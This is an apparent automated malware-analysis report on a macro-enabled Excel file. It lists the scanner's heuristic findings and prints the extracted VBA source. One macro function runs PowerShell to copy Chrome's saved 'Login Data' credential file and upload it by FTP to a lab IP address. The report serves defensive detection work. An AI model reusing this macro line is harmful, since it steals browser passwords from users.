MALICIOUS
180
Risk Score
Heuristics 4
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
strOutput = Shell("cmd.exe /C Powershell Copy-Item -Path """"""$env:LocalAppData\Google\Chrome\User Data\Default\Login Data"""""" -Destination $env:tmp\chromeLoginData; (New-Object System.Net.WebClient).UploadFile('ftp://anonymous:@192.168.56.102/data/logindata', """"""$env:tmp\chromeLoginData"""""")") -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
ActiveCell.FormulaR1C1 = " strCommand = ""Powershell Echo Hello World""" -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
strOutput = Shell("cmd.exe /C Powershell Copy-Item -Path """"""$env:LocalAppData\Google\Chrome\User Data\Default\Login Data"""""" -Destination $env:tmp\chromeLoginData; (New-Object System.Net.WebClient).UploadFile('ftp://anonymous:@192.168.56.102/data/logindata', """"""$env:tmp\chromeLoginData"""""")")
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3427 bytes |
SHA-256: a4c65dc7d678e6d84d675932f80ab789c438423b48dd1c10d465138398484243 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Modul1"
Sub test1()
Attribute test1.VB_ProcData.VB_Invoke_Func = " \n14"
'
' test1 Makro
'
'
ActiveWindow.SmallScroll Down:=12
Range("A16").Select
ActiveWindow.SmallScroll Down:=27
ActiveWindow.ScrollRow = 42
ActiveWindow.ScrollRow = 41
ActiveWindow.ScrollRow = 40
ActiveWindow.ScrollRow = 39
ActiveWindow.ScrollRow = 38
ActiveWindow.ScrollRow = 36
ActiveWindow.ScrollRow = 34
ActiveWindow.ScrollRow = 32
ActiveWindow.ScrollRow = 30
ActiveWindow.ScrollRow = 27
ActiveWindow.ScrollRow = 25
ActiveWindow.ScrollRow = 23
ActiveWindow.ScrollRow = 21
ActiveWindow.ScrollRow = 19
ActiveWindow.ScrollRow = 16
ActiveWindow.ScrollRow = 14
ActiveWindow.ScrollRow = 13
ActiveWindow.ScrollRow = 11
ActiveWindow.ScrollRow = 8
ActiveWindow.ScrollRow = 6
ActiveWindow.ScrollRow = 5
ActiveWindow.ScrollRow = 3
ActiveWindow.ScrollRow = 2
ActiveWindow.ScrollRow = 1
Range("A1").Select
ActiveSheet.Paste
ActiveWindow.SmallScroll Down:=6
ActiveWindow.ScrollRow = 24
ActiveWindow.ScrollRow = 23
ActiveWindow.ScrollRow = 22
ActiveWindow.ScrollRow = 21
ActiveWindow.ScrollRow = 20
ActiveWindow.ScrollRow = 19
ActiveWindow.ScrollRow = 18
ActiveWindow.ScrollRow = 17
ActiveWindow.ScrollRow = 16
ActiveWindow.ScrollRow = 15
ActiveWindow.ScrollRow = 14
ActiveWindow.ScrollRow = 12
ActiveWindow.ScrollRow = 11
ActiveWindow.ScrollRow = 10
ActiveWindow.ScrollRow = 9
ActiveWindow.ScrollRow = 8
ActiveWindow.ScrollRow = 7
ActiveWindow.ScrollRow = 6
ActiveWindow.ScrollRow = 5
ActiveWindow.ScrollRow = 4
ActiveWindow.ScrollRow = 3
ActiveWindow.ScrollRow = 2
ActiveWindow.ScrollRow = 1
Range("A2").Select
ActiveCell.FormulaR1C1 = ""
Range("A3").Select
ActiveCell.FormulaR1C1 = " strCommand = ""Powershell Echo Hello World"""
Range("A6").Select
ChDir "C:\Users\Kassandra\Desktop"
ActiveWorkbook.SaveAs Filename:="C:\Users\Kassandra\Desktop\test1.xlsm", _
FileFormat:=xlOpenXMLWorkbookMacroEnabled, CreateBackup:=False
Range("C7").Select
End Sub
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Modul2"
Function RunAndGetCmd()
'strOutput = Shell("cmd /C Powershell Copy-Item -Path """"""$env:LocalAppData\Google\Chrome\User Data\Default\Login Data"""""" -Destination $env:tmp\chromeLoginData")
strOutput = Shell("cmd.exe /C Powershell Copy-Item -Path """"""$env:LocalAppData\Google\Chrome\User Data\Default\Login Data"""""" -Destination $env:tmp\chromeLoginData; (New-Object System.Net.WebClient).UploadFile('ftp://anonymous:@192.168.56.102/data/logindata', """"""$env:tmp\chromeLoginData"""""")")
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 34304 bytes |
SHA-256: 704da8686bef806aa2f2480144129525f5bdaf48ab2d2632f68c0ffcdcac693b |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.